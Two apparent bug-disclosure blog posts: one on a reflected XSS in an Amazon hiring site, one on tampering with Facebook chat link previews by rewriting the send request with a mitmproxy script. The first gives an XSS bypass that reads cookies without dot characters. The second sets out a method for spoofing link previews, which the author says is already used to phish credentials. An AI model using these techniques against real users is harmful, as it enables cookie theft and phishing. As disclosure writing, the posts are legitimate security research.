On March 13th, by using dnsrecon (https://github.com/darkoperator/dnsrecon) and a huge wordlist, I came across with an Amazon domain (hireon.amazon.com) with a Reflected XSS.
Usually I don't use to write an article for an XSS vulnerability, but I would share a trick I discovered during this analysis.
Looking for a not existent resource, the following error message was displayed on the web page.
In order to show an alert box with the current domain name (or cookies) I should have used “document.domain” or "document.cookie" but because of dot character I had to find an alternative way. At that point I tried to use the document object like an associative array (as shown in the following screenshot) and I was able to show the current domain name within the alert box.
document["domain"] or document["cookie"]
On March 21st, Amazon changed the domain name in livecode.amazon.jobs but the XSS was still there.
Finally, on March 26th, the XSS was completely fixed.
- March 13th - First contact
- March 21st - Domain change but the vulnerability is still there.
- March 26th - Fixed
I often wondered how link generation functionality is implemented by major social network applications and, more specifically, how the preview generation is developed.
Some time ago a friend of mine was spear-phished with a message through the Facebook chat, this happened before Facebook put in place the patch to allow the exchange of messages only between people connected as friends. While I was analyzing the message, I noticed that it looked like a legit message, with a link to a newspaper page, a title, body and image, but also with a pseudo-random generated domain like the killswitch domain used by WannaCry ransomware, written in a small gray text area below the description.
Crawling on Google I found out that someone already reported a similar finding to Facebook Security Team but it was not exactly the same issue that I discovered; they were just talking about the ability to to inject whatever URL inside opengraph tags. So I decided to go straight through that to figure out something more.
The Facebook chat and board features implement a functionality to generate a preview box whenever someone write a full URL in a message; the Facebook crawler then will scan the target website, take some markup headers parameters like og:title og:description along with an icon of the page and returns a preview box. This is a part of the already known OpenGraph Markup Language, nothing new.
What I didn't expect is that the Facebook web application uses data that client sends to generate the URLs inside the generated preview box.
Getting hands dirty
Starting Burp Suite, a Web application security tool, i started to intercept all the traffic from and to the platform; we'll use repubblica.it as a target, an italian newspaper.
Note: I tested it out sending message to myself for not violating the whitehat disclosure rules.
Look at those URLs, what happens if we change them?
And after forwarding the message:
The original URL, the icon, title and body is taken directly from the repubblica.it website, except for that little grayed text below "google.it". When we click on it we will get:
At this stage we know:
- The output URL is what we send from AJAX POST request
- URLs are not encoded
- Server does not validate if the input URL is the same that we typed it.
- Server does not validate if the result mismatch with our tampered request.
But we need to go a little further, in order to achieve a perfect, standalone Proof Of Concept we need to perform those actions at runtime, without interrupting outgoing HTTP requests and without using tools like Burp or OWASP ZAP.
Mitmproxy to the rescue!
Mitmproxy is basically a python software that acts as an HTTP proxy like BurpSuite but with the ability to change every aspect of an HTTP request or response at runtime; it can be even used as an interactive console to change/inspect HTTP requests. And that's exactly what we were looking for.
We wrote a small python script that takes everything we get from the POST request sent to /messaging/send endpoint and replace every original URL (www.repubblica.it) with our (www.voidzone.it) using a regular expression.
Since the server somehow does not like URL parameters I configured my website to perform a permanent redirect to a youtube video so no GET parameters are needed.
Next, we fire up our proxy
And just try to resend the same message:
And if we click it
Yeah you just got rick roll'd :)
Facebook security team is already aware of this issue and this is the response:
So they will consider it as "low-impact risk" and most probably they will not fix.
I'm trying to figure out why a content based social network like Facebook does not consider a content vulnerability like this, marking it as "low risk" even after I reported that someone is already using it to steal Facebook credentials.
Please note: this vulnerability has been found also on the Facebook dashboard section.
So what we learned from this, is that Facebook seems not to validate input URLs allowing every nasty user to tamper URL previews with arbitrary contents.